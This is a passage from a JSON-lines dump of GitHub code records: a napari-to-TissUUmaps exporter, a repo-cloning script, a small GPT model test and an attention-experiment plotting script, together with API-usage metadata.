"name"}, {"api_name": "chromite.lib.failures_lib.SuiteTimedOut", "line_number": 132, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 132, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.BoardNotAvailable", "line_number": 134, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 134, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.TestLabFailure", "line_number": 136, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 136, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.TestWarning", "line_number": 138, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 138, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.TestFailure", "line_number": 140, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 140, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.commands.HWTestSuiteResult", "line_number": 147, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 147, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.StepFailure", "line_number": 151, "usage_type": "attribute"}, {"api_name": "chromite.lib.failures_lib", "line_number": 151, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 305, "usage_type": "call"}, {"api_name": "chromite.lib.fake_cidb.FakeCIDBConnection", "line_number": 306, "usage_type": "call"}, {"api_name": "chromite.lib.fake_cidb", "line_number": 306, "usage_type": "name"}, {"api_name": "chromite.lib.const.waterfall.WATERFALL_INTERNAL", "line_number": 307, "usage_type": "attribute"}, {"api_name": "chromite.lib.const.waterfall", "line_number": 307, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_ABORT", "line_number": 322, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 322, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_OTHER", "line_number": 323, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 323, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_FAIL", "line_number": 324, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 324, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_FAIL", "line_number": 325, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 325, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_PASS", "line_number": 326, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 326, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.stages.test_stages.HWTestStage", "line_number": 336, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 336, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 337, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 338, "usage_type": "argument"}, {"api_name": "mock.ANY", "line_number": 341, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages_unittest.AbstractStageTestCase", "line_number": 344, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages_unittest", "line_number": 344, "usage_type": "name"}, {"api_name": "chromite.lib.cros_test_lib.RunCommandTestCase", "line_number": 345, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_test_lib", "line_number": 345, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest.SimpleBuilderTestCase", "line_number": 346, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest", "line_number": 346, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 353, "usage_type": "call"}, {"api_name": "os.path", "line_number": 353, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 354, "usage_type": "argument"}, {"api_name": "chromite.lib.path_util", "line_number": 356, "usage_type": "argument"}, {"api_name": "chromite.cbuildbot.stages.test_stages.ImageTestStage", "line_number": 365, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 365, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 373, "usage_type": "call"}, {"api_name": "os.path", "line_number": 373, "usage_type": "attribute"}, {"api_name": "chromite.lib.path_util.ToChrootPath", "line_number": 376, "usage_type": "call"}, {"api_name": "chromite.lib.path_util", "line_number": 376, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 376, "usage_type": "call"}, {"api_name": "os.path", "line_number": 376, "usage_type": "attribute"}, {"api_name": "chromite.lib.path_util.ToChrootPath", "line_number": 378, "usage_type": "call"}, {"api_name": "chromite.lib.path_util", "line_number": 378, "usage_type": "name"}]} +{"seq_id": "32825167363", "text": "\"\"\"This module implements an exporter from the Napari layers to TissUUmaps.\nThe functions are implemented such that the module can be reused in other\ncontext by generating pythonic versions of the data first, then saving them.\n\"\"\"\nimport json\nfrom logging import getLogger\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Union\n\nimport numpy as np\nfrom napari.layers.labels.labels import Labels\nfrom napari.types import FullLayerData\nfrom napari.utils.io import imsave\n\nlogger = getLogger(__name__)\n\n\ndef filter_type(\n layer_data: List[FullLayerData], type_filter: Union[str, List[str]]\n) -> List[FullLayerData]:\n \"\"\"Filters a list of layers provided by Napari by layer type.\n Only the layers that corresponds to `type_filter` are returned.\n\n Parameters\n ----------\n layer_data : List[FullLayerData]\n The list of layers provided by Napari. Must contain tuples, with the\n third one corresponding to the layer type as a string.\n type_filter : Union[str, List[str]]\n The filter to use a string. It is possible to use multiple filters by\n providing a list of strings.\n Returns\n -------\n List[FullLayerData]\n The list of layers in the same format as the one in `layer_data` where\n the layer types *not* corresponding to `type_filter` are discarded.\n \"\"\"\n # Making sure `file_type` is a list\n if not isinstance(type_filter, list):\n type_filter = [type_filter]\n\n return [\n (data, meta, layer_type)\n for (data, meta, layer_type) in layer_data\n if layer_type in type_filter\n ]\n\n\ndef generate_tmap_config(\n filename: str,\n layer_data: List[FullLayerData],\n internal_shapes: bool = False,\n) -> Dict[str, Any]:\n \"\"\"Generates the tissumaps config of the napari layers to be saved.\n\n Parameters\n ----------\n filename : str\n The filename to use in Tissuumaps.\n layer_data : List[FullLayerData]\n The layers to be saved as provided by the Napari plugin manager. It\n contains a list of layers, which are themselves dictionary containing\n the data, the metadata and the type of layer.\n internal_shapes : bool\n Determines if the shapes layer are saved in the tmap file (True) or if\n the tmap file references an external json file (False).\n Returns\n -------\n Dict[str, Any]\n The Tissuumaps configuration as a dictionary. The aim is to later save\n a json file with a .tmap extension.\n \"\"\"\n # This function first create nested lists and dictionary to add the the\n # final dictionary in the latter part of the function.\n\n # Generating the list of markers (points).\n markers = []\n for data, meta, _ in filter_type(layer_data, \"points\"):\n markers.append(\n {\n \"autoLoad\": True,\n \"comment\": meta[\"name\"],\n \"expectedCSV\": {\n \"X_col\": \"x\",\n \"Y_col\": \"y\",\n \"color\": \"color\",\n \"group\": \"name\",\n \"name\": \"\",\n \"key\": \"letters\",\n },\n \"path\": f\"points/{meta['name']}.csv\",\n \"title\": f\"Download markers ({meta['name']})\",\n }\n )\n\n # Generating the list of layers (images and labels)\n layers, layer_filters, layer_opacities, layer_visibilities = [], {}, {}, {}\n default_filters = [\n {\"name\": \"Brightness\", \"value\": \"0\"},\n {\"name\": \"Contrast\", \"value\": \"1\"},\n {\"name\": \"Color\", \"value\": \"0\"},\n ]\n regions = {}\n idx = (\n 0 # Image index, keeps track of images and labels to get a consistent\n )\n # indexing in the tmap project file.\n for data, meta, layer_type in layer_data:\n if layer_type == \"image\":\n layers.append(\n {\n \"name\": meta[\"name\"],\n \"tileSource\": f\"images/{meta['name']}.tif.dzi\",\n }\n )\n layer_filters[str(idx)] = default_filters.copy()\n layer_opacities[str(idx)] = \"{:.3f}\".format(meta[\"opacity\"])\n layer_visibilities[str(idx)] = bool(meta[\"visible\"])\n idx += 1\n elif layer_type == \"labels\":\n layers.append(\n {\n \"name\": meta[\"name\"],\n \"tileSource\": f\"labels/{meta['name']}.tif.dzi\",\n }\n )\n layer_filters[str(idx)] = default_filters.copy()\n layer_opacities[str(idx)] = \"{:.3f}\".format(meta[\"opacity\"])\n layer_visibilities[str(idx)] = bool(meta[\"visible\"])\n idx += 1\n elif layer_type == \"shapes\":\n regions.update(generate_shapes_dict(data, meta))\n\n # The final configuration to be returned, combining all the lists and\n # dictionaries generated above.\n config = {\n \"compositeMode\": \"lighter\",\n \"filename\": filename,\n \"layers\": layers,\n \"filters\": [\"Brightness\", \"Contrast\", \"Color\"],\n \"layerFilters\": layer_filters,\n \"layerOpacities\": layer_opacities,\n \"layerVisibilities\": layer_visibilities,\n \"markerFiles\": markers,\n \"settings\": [\n {\"function\": \"_autoLoadCSV\", \"module\": \"dataUtils\", \"value\": True},\n {\n \"function\": \"_globalMarkerScale\",\n \"module\": \"glUtils\",\n \"value\": 7.5,\n },\n ],\n }\n if not regions:\n config[\"regions\"] = {}\n elif internal_shapes:\n config[\"regions\"] = regions\n else:\n config[\"regionFile\"] = \"regions/regions.json\"\n\n return config\n\n\ndef generate_shapes_dict(\n data: FullLayerData, meta: Dict[str, Any]\n) -> Dict[str, Any]:\n \"\"\"Generates a dictionary containing the info to plot shapes in Tissuumaps.\n The dict can later on be exported as a geoJson file or added to the .tmap\n project file.\n\n Parameters\n ----------\n data : FullLayerData\n The Shapes layer data (A list of shapes, which are lists of points) as\n provided by Napari.\n meta : Dict[str, Any]\n The metadata of the shapes layer containing the name and colors of the\n shapes.\n\n Returns\n -------\n Dict[str, Any]\n A dictionary containing the information to draw the shapes in\n Tissuumaps.\n \"\"\"\n shape_dict = {\"type\": \"FeatureCollection\", \"features\": []}\n for i, shape in enumerate(data):\n shape_type = meta[\"shape_type\"][i]\n shape_name = meta[\"name\"] + f\"_{shape_type}_{i+1}\"\n shape_color = (255 * meta[\"face_color\"][i, :3]).astype(int).tolist()\n # We enumerate each shapes that appear in the layer\n subshape_dict = {\n \"type\": \"Feature\",\n \"geometry\": {\"type\": \"MultiPolygon\"},\n \"properties\": {\n \"name\": shape_name,\n \"classification\": {\"name\": \"\"},\n \"color\": shape_color,\n \"isLocked\": False,\n },\n }\n # Different shapes have different points to draw\n points_to_draw = []\n if shape_type == \"ellipse\":\n assert isinstance(shape, np.ndarray)\n ellipse_center = (\n (shape[0][0] + shape[2][0]) / 2.0,\n (shape[0][1] + shape[1][1]) / 2.0,\n )\n # `a` represents the vector from the center of the ellipse to the\n # right hand side, while `b` is the up vector.\n ellipse_a = shape[1][0] - ellipse_center[0]\n ellipse_b = shape[1][1] - ellipse_center[1]\n\n # Minimum arc distance is the the length of a single arc as a\n # function of the ellipse's radii. The purpose is such that the\n # resolution (number of points) grows with the ellipse. The formula\n # is approximated and compute the arc based on a circle with the\n # radius being equal to the longest axis of the ellipse.\n minimum_arc_distance = 3.0\n max_axis = np.maximum(np.abs(ellipse_a), np.abs(ellipse_b))\n N = np.maximum(\n int(np.ceil(2.0 * np.pi * max_axis / minimum_arc_distance)), 10\n )\n thetas = np.linspace(0, 2 * np.pi, N + 1)\n points_to_draw = np.stack(\n [\n ellipse_a * np.cos(thetas) + ellipse_center[0],\n ellipse_b * np.sin(thetas) + ellipse_center[1],\n ],\n axis=-1,\n )\n elif shape_type == \"line\" or shape_type == \"path\":\n assert isinstance(shape, np.ndarray)\n points_to_draw = np.vstack([shape, shape[-2::-1]])\n else: # shape_type == \"polygon\" or shape_type == \"rectangle\"\n assert isinstance(shape, np.ndarray)\n points_to_draw = shape\n\n # The columns are swapped due to conventional differences between\n # Napari (y, x) and TissUUmaps (x, y)\n coordinates = points_to_draw[:, [1, 0]].tolist()\n subshape_dict[\"geometry\"][\"coordinates\"] = [[coordinates]]\n # Adding the properties, if there are any\n properties = meta.get(\"properties\", {}).copy()\n for prop in properties:\n if isinstance(properties[prop], np.ndarray):\n properties[prop] = properties[prop].tolist()[i]\n subshape_dict[\"properties\"][\"extra\"] = properties\n # We add it to the full dict\n shape_dict[\"features\"].append(subshape_dict)\n return shape_dict\n\n\ndef rgb2hex(color_vec: np.ndarray) -> str:\n \"\"\"Transforms an array of floats into a hex color string (#xxxxxx).\n\n Parameters\n ----------\n color_vec : np.ndarray\n A numpy array of three rgb components.\n Returns\n -------\n str\n The color as a string in hex format.\n \"\"\"\n return \"#\" + \"\".join([f\"{int(c*255):02X}\" for c in color_vec[:3]])\n\n\ndef tmap_writer(\n save_path: Union[Path, str], layer_data: List[FullLayerData]\n) -> List[str]:\n \"\"\"Creates a Tissuumaps project folder based on a Napari list of layers.\n\n Parameters\n ----------\n save_path : Union[Path, str]\n The path to save the Tissuumaps project to. Must contain the name of\n the tissumap project file, including the .tmap extension.\n layer_data : List[FullLayerData]\n The list of layers to save as provided by Napari.\n Returns\n -------\n List[str]\n A list of string containing each of the filenames that were written.\n \"\"\"\n savedfilenames = []\n # The main tissuumaps project folder is created.\n save_path = Path(save_path)\n save_path.mkdir(parents=True, exist_ok=True)\n\n # Creation of the tmap file\n tmap_cfg = generate_tmap_config(save_path.stem, layer_data)\n tmap_file = open(save_path / \"main.tmap\", \"w+\")\n savedfilenames.append(tmap_file.name)\n tmap_file.write(json.dumps(tmap_cfg, indent=4))\n tmap_file.close()\n\n # Shapes have to be combined in the same file\n regions = {}\n # Saving the files\n for data, meta, layer_type in layer_data:\n if layer_type == \"image\":\n # The Napari images can directly be saved to tif.\n image_folder = save_path / \"images\"\n image_folder.mkdir(exist_ok=True)\n path_image = image_folder / f\"{meta['name']}.tif\"\n imsave(str(path_image), data)\n savedfilenames.append(path_image)\n elif layer_type == \"points\":\n # The Napari points are in a different coordinate system (y,x)\n # that must be converted to Tissuumaps which uses (x,y). The colors\n # of the individual points are extracted from the metadata.\n points_folder = save_path / \"points\"\n points_folder.mkdir(exist_ok=True)\n path_points = points_folder / f\"{meta['name']}.csv\"\n # Constructing the columns\n y, x = data[:, 0:1], data[:, 1:2]\n color = np.array(\n [[rgb2hex(color)] for color in meta[\"face_color\"]]\n )\n symbol = np.array([[meta[\"symbol\"]]] * x.shape[0])\n points = np.block([x, y, color, symbol])\n # Extract the properties\n properties = meta.get(\"properties\")\n # Saving the csv file manually.\n points_file = open(path_points, \"w+\")\n savedfilenames.append(path_points.name)\n prop_keys = \",\" + \",\".join(properties.keys()) if properties else \"\"\n points_file.write(f\"name,x,y,color,symbol{prop_keys}\\n\")\n for i, (_x, _y, _color, _symbol) in enumerate(points):\n points_file.write(\n f\"{meta['name']},{_x},{_y},{_color},{_symbol}\"\n )\n if properties:\n for prop in properties.keys():\n points_file.write(f\",{properties[prop][i]}\")\n points_file.write(\"\\n\")\n points_file.close()\n elif layer_type == \"labels\":\n # The labels layers may have multiple sub-labels that must be\n # separated in different images for Tissuumaps to read. Each label\n # gets a color given by a random colormap from Napari.\n labels_folder = save_path / \"labels\"\n labels_folder.mkdir(exist_ok=True)\n path_label = labels_folder / f\"{meta['name']}.tif\"\n # Recreating the colored image\n label_layer = Labels(data, **meta)\n label_img = label_layer.colormap.map(\n label_layer._raw_to_displayed(data)\n )\n label_img_uint8 = (label_img * 255.0).astype(np.uint8)\n imsave(str(path_label), label_img_uint8)\n savedfilenames.append(path_label)\n elif layer_type == \"shapes\":\n regions.update(generate_shapes_dict(data, meta))\n else:\n logger.warning(\n f\"Layer \\\"{meta['name']}\\\" cannot be saved. This type of layer\"\n \" ({layer_type}) is not yet implemented.\"\n )\n\n # Saving the shapes\n if len(regions) > 0:\n shapes_folder = save_path / \"regions\"\n shapes_folder.mkdir(exist_ok=True)\n # Saving the json\n shapes_filename = \"regions.json\"\n shapes_file = open(shapes_folder / shapes_filename, \"w+\")\n savedfilenames.append(shapes_file.name)\n shapes_file.write(json.dumps(regions, indent=4))\n shapes_file.close()\n\n # Convertion from Path to str\n savedfilenames = list(map(str, savedfilenames))\n return savedfilenames\n", "repo_name": "TissUUmaps/napari-tissuumaps", "sub_path": "src/napari_tissuumaps/convert.py", "file_name": "convert.py", "file_ext": "py", "file_size_in_byte": 14484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 19, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 51, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 53, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 165, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 165, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 165, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 205, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 225, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 226, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 237, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 247, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 166, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 166, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 255, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 271, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 271, "usage_type": "name"}, {"api_name": "napari.types.FullLayerData", "line_number": 271, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 289, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 296, "usage_type": "call"}, {"api_name": "napari.utils.io.imsave", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.block", "line_number": 323, "usage_type": "call"}, {"api_name": "napari.layers.labels.labels.Labels", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 352, "usage_type": "attribute"}, {"api_name": "napari.utils.io.imsave", "line_number": 353, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 371, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 272, "usage_type": "name"}]} +{"seq_id": "71246245925", "text": "import pandas as pd\nfrom git import Repo\nimport os, shutil\n\n\n# clones all the repo of a csv with a collum named 'links' with the github url to a folder called \"java_files\"\ndef download_repos():\n df = pd.read_csv('repos.csv')\n\n if not os.path.exists('java_files'):\n os.makedirs('java_files')\n else:\n shutil.rmtree('java_files')\n os.makedirs('java_files')\n\n for index, row in df.iterrows():\n try:\n print(row['links'])\n repo_name = row['links'].split('/')\n repo_name = repo_name[3] + '-' + repo_name[-1] # get user and repo name in the form: 'user/repo_name'\n print(repo_name)\n Repo.clone_from(row['links'], 'java_files/' + repo_name)\n except:\n pass\n\n\ndownload_repos()", "repo_name": "lucasraggi/snippet-recommender-bot", "sub_path": "data_preprocess/download_repos_from_csv.py", "file_name": "download_repos_from_csv.py", "file_ext": "py", "file_size_in_byte": 778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 11, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 13, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 14, "usage_type": "call"}, {"api_name": "git.Repo.clone_from", "line_number": 22, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "39169946799", "text": "import torch\nfrom llms.models.gptmm import gptmm\nfrom torch.autograd import Variable\n\n\ndef test_gptmm():\n batch_size = 1\n block_size = 8\n n_layers = 6\n vocab_size = 27 # get to dataset\n n_embd = 32\n n_heads = 4\n\n model = gptmm(\n False, n_layers=n_layers, vocab_size=vocab_size, n_embd=n_embd, n_heads=n_heads, block_size=block_size\n )\n\n x = Variable(torch.randint(0, 27, (batch_size, block_size)))\n y = model(x)\n print(y.size())\n print(y[0, -1, :])\n", "repo_name": "pedrodiamel/gpt_mini_mini", "sub_path": "test/models/test_gptmm.py", "file_name": "test_gptmm.py", "file_ext": "py", "file_size_in_byte": 493, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "llms.models.gptmm.gptmm", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.randint", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "2191799837", "text": "\nimport importlib.util, os\nspec = importlib.util.spec_from_file_location(\"link_libs\", os.environ['LIB_SCRIPT'])\nlink_libs = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(link_libs)\n\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib.collections import LineCollection\nfrom matplotlib.patches import Ellipse\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport seaborn as sns\n\nimport itertools as iit\nimport sklearn.metrics as skmtr\nimport pandas as pd\nimport numpy as np\nnp.cat = np.concatenate\nimport h5py\n\nfrom proc import detection_task as det\n\nsns.set_context('paper')\nsns.set_style('ticks')\n\n\n# Parameters\nLAYER = '0.4.3'\nJTR = 0.15\nMODEL = 'gauss'\nFOLDER = 'fig2'\nTGT = 3\nDST0 = 4\nDST1 = 5\nEM = 2.1415\n\n# Load input data\nuncued = h5py.File(Paths.data('runs/fig2/fnenc_task_base.h5'), 'r+')\ncued = h5py.File(Paths.data(f'runs/{FOLDER}/enc_task_{MODEL}_b4.0.h5'), 'r+')\nfn_uncued = h5py.File(Paths.data('runs/fig2/fn_fnenc_task_base.h5'), 'r+')\nfn_cued = h5py.File(Paths.data(f'runs/{FOLDER}/fn_enc_task_{MODEL}_b4.0.h5'), 'r+')\nregs = det.load_logregs(Paths.data('models/logregs_iso224_t100.npz'))\n\npos_dist = []; pos_focl = []\nneg_dist = []; neg_focl = []\nfor i_cat, c in enumerate(regs):\n dist_dot = uncued[LAYER][i_cat] * regs[c].w.detach().numpy()[..., None, None]\n pos_dist.append(dist_dot[1::2, :, :, :].reshape([-1, 7, 7]) )\n neg_dist.append(dist_dot[::2, :, :, :].reshape([-1, 7, 7]) )\n focl_dot = cued[LAYER][i_cat] * regs[c].w.detach().numpy()[..., None, None]\n pos_focl.append(focl_dot[1::2, :, :, :].reshape([-1, 7, 7]) )\n neg_focl.append(focl_dot[::2, :, :, :].reshape([-1, 7, 7]) )\npos_dist = np.cat(pos_dist); pos_focl = np.cat(pos_focl)\nneg_dist = np.cat(neg_dist); neg_focl = np.cat(neg_focl)\n\n\ndef tgt_dct(img):\n tgt = img[:, :TGT, :TGT].reshape(len(img), -1)\n dct = np.concatenate([\n img[:, DST0:DST1, :DST1].reshape(len(img), -1),\n img[:, :DST0, DST0:DST1].reshape(len(img), -1)\n ], axis = 1)\n return tgt, dct\n\ndef jtr(arr):\n return np.random.uniform(-JTR, JTR, arr.shape)\n\npos_dist_tgt, pos_dist_dct = tgt_dct(pos_dist)\npos_focl_tgt, pos_focl_dct = tgt_dct(pos_focl)\nneg_dist_tgt, neg_dist_dct = tgt_dct(neg_dist)\nneg_focl_tgt, neg_focl_dct = tgt_dct(neg_focl)\n\nC0 = '#E64A19'\nC1 = '#E64A19'\nC2 = '#1976D2' #Lighter: '#03A9F4'\nC3 = '#1976D2' #Ligher: '#FFCA28'\n\naggs = {\n 'mean': lambda a: a.mean(axis = 0),\n 'take': lambda a: [print(a.shape), a[::1711].ravel()][-1]\n}\nAGG_NAME = 'mean'\nAGG = aggs[AGG_NAME]\nS = 12\n\nfig, ax = plt.subplots(figsize = (3 * EM, EM))\n\nplt.scatter(\n 0 + jtr(AGG(pos_dist_tgt)), AGG(pos_dist_tgt),\n lw = 0.25, c = C0, edgecolor = (1, 1, 1, 1), s = S,\n label = 'Uncued, Target')\nplt.scatter(\n 1 + jtr(AGG(neg_dist_tgt)), AGG(neg_dist_tgt),\n lw = 0.25, c = C1, edgecolor = (1, 1, 1, 1), s = S)\n\nplt.scatter(\n 2 + jtr(AGG(pos_focl_tgt)), AGG(pos_focl_tgt),\n lw = 0.25, c = C2, edgecolor = (1, 1, 1, 1), s = S,\n label = 'Cued, Target')\nplt.scatter(\n 3 + jtr(AGG(neg_focl_tgt)), AGG(neg_focl_tgt),\n lw = 0.25, c = C3, edgecolor = (1, 1, 1, 1), s = S)\n\n\nplt.scatter(\n 4 + jtr(AGG(pos_dist_dct)), AGG(pos_dist_dct),\n lw = 0.5, edgecolor = C0, color = (1, 1, 1, 1), s = 0.6*S,\n label = 'Uncued, Edge')\nplt.scatter(\n 5 + jtr(AGG(neg_dist_dct)), AGG(neg_dist_dct),\n lw = 0.5, edgecolor = C1, color = (1, 1, 1, 1), s = 0.6*S)\n\nplt.scatter(\n 6 + jtr(AGG(pos_focl_dct)), AGG(pos_focl_dct),\n lw = 0.5, edgecolor = C2, color = (1, 1, 1, 1), s = 0.6*S,\n label = 'Cued, Edge')\nplt.scatter(\n 7 + jtr(AGG(neg_focl_dct)), AGG(neg_focl_dct),\n lw = 0.5, edgecolor = C3, color = (1, 1, 1, 1), s = 0.6*S)\n\nplt.axhline(lw = 1, color = '.7', zorder = -1, ls = '--')\nax.set_xticks(np.arange(8))\nax.set_xticklabels(['Pos', 'Neg'] * 4)\nplt.legend(frameon = True, ncol = 2)\nplt.tight_layout()\n\nplt.savefig(Paths.plots(f'runs/feat_motion/feat_prod_{AGG_NAME}.pdf'))\nplt.close()\n\n\n\n\"\"\"\n---------------------------------------------------------------------\n\nFlexing of feature space: Average response to \"Banana\" increases even\nfor \"Bathtub\" units when attn preferentially applied to \"Banana\".\n\n\"\"\"\n\nnonlins = {\n 'lin': lambda x: x,\n 'sig': lambda x: 1 / (1 + np.exp(-x)),\n 'rlu': lambda x: np.maximum(0, x),\n}\n\nunits = np.arange(20)\n\nwith PdfPages(Paths.plots('runs/feat_motion/outgroup_tuning.pdf')) as pdf:\n for unit, (nl_name, nl) in iit.product(units, nonlins.items()):\n\n # 0th decoder/classifier unit\n act_dist = fn_uncued[LAYER][:, :, unit, :, :].mean(axis = (-2, -1))\n act_focl = fn_cued[LAYER][:, :, unit, :, :].mean(axis = (-2, -1))\n\n fig, ax = plt.subplots(figsize = (2 * EM, EM))\n\n other = np.cat([np.arange(unit), np.arange(unit+1, 20)])\n # Bathtub unit, images with a banana and 3 distractors\n (lambda Y: (plt.scatter(\n 0 + jtr(Y), Y,\n color = '#E64A19', s = 25),\n plt.scatter(\n 0, Y.mean(),\n color = '.3', s = 37, lw = 1, edgecolor = '1.'\n )))(\n nl(act_dist[other, 1::2]).mean(axis = -1))\n # Bathtub unit, images with an attended banana and 3 distractors\n (lambda Y: (plt.scatter(\n 1 + jtr(Y), Y,\n color = '#1976D2', s = 25),\n plt.scatter(\n 1, Y.mean(),\n color = '.3', s = 37, lw = 1, edgecolor = '1.'\n )))(\n nl(act_focl[other, 1::2]).mean(axis = -1))\n\n cat = list(regs.keys())[unit]\n plt.title(f\"Nonlin: {nl_name} | Unit: {cat}\")\n ax.set_xticks([0, 1])\n ax.set_xticklabels(['Uncued', 'Cued'])\n plt.xlim(-0.5, 1.5)\n plt.tight_layout()\n pdf.savefig()\n plt.close()\n\n\n\nplt.scatter(\n SG(act_dist[0, 1::2]), SG(act_dist[1, 1::2]))\nplt.scatter(\n SG(act_dist[0, 1::2]).mean(), SG(act_dist[1, 1::2]).mean(),\n color = '.3')\nplt.scatter(\n SG(act_focl[0, 1::2]), SG(act_focl[1, 1::2]))\nplt.scatter(\n SG(act_focl[0, 1::2]).mean(), SG(act_focl[1, 1::2]).mean(),\n color = '.5')\nplt.gca().set_aspect(1.)\n\n\n\n\n\n", "repo_name": "dbirman/attfield2", "sub_path": "code/script/figs/figX/noise_expand.py", "file_name": "noise_expand.py", "file_ext": "py", "file_size_in_byte": 6131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "importlib.util.util.spec_from_file_location", "line_number": 3, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 3, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 3, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "importlib.util.util.module_from_spec", "line_number": 4, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 4, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 4, "usage_type": "name"}, {"api_name": "numpy.cat", 